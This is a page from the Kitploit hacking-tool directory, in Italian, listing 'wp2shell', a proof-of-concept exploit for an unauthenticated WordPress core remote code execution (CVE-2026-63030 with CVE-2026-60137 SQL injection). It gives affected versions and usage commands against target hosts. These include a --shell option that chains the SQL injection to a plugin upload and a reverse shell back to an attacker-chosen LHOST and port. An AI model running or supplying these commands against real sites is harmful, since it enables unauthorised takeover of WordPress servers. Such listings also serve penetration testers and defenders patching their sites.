Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-63030 — Exploit PoC della RCE non autenticata del core di WordPress conosciuta come WP2Shell | Kitploit
Strumenti/GitHubGitHub/mverschu/cve-2026-63030
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubmverschu/cve-2026-63030

CVE-2026-63030

Exploit PoC della RCE non autenticata del core di WordPress conosciuta come WP2Shell

Vedi Repository
41111 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

wp2shell (CVE-2026-63030 / CVE-2026-60137)

Nomewp2shell
CVECVE-2026-63030 (desync del batch), CVE-2026-60137 (author__not_in SQLi)
Versioni interessateWordPress da 6.9.0 a 6.9.4, da 7.0.0 a 7.0.1
Corretto in6.9.5, 7.0.2
Autenticazione necessariaNessuna
Scoperto daAdam Kues (Searchlight Cyber / Assetnote)

Utilizzo

Host senza schema = rilevamento automatico dello schema (prova https:// e poi http://). Anteponi http:// o https:// solo quando vuoi forzarne uno.

root@kitploit:~
# auto-detect scheme
wp2shell target.example
wp2shell 127.0.0.1:8080

# force a scheme
wp2shell https://target.example/
wp2shell http://127.0.0.1:8080/

# timing confirm
wp2shell target.example --confirm-sqli

# SQLi -> oEmbed/admin bridge -> plugin -> reverse shell
wp2shell target.example --shell
wp2shell target.example --shell 192.168.1.10 4443
FlagCosa fa
--shell [LHOST [LPORT]]catena RCE standard; LHOST di default è l'IP di questa macchina, LPORT è 443
--rest-routeprova prima /?rest_route=/batch/v1
--verify-tlsverifica i certificati TLS (disattivata di default per lab o certificati autofirmati)
--proxy URLinvia il traffico attraverso un proxy
--forcesalta il fingerprinting di WordPress
Scarica lo strumento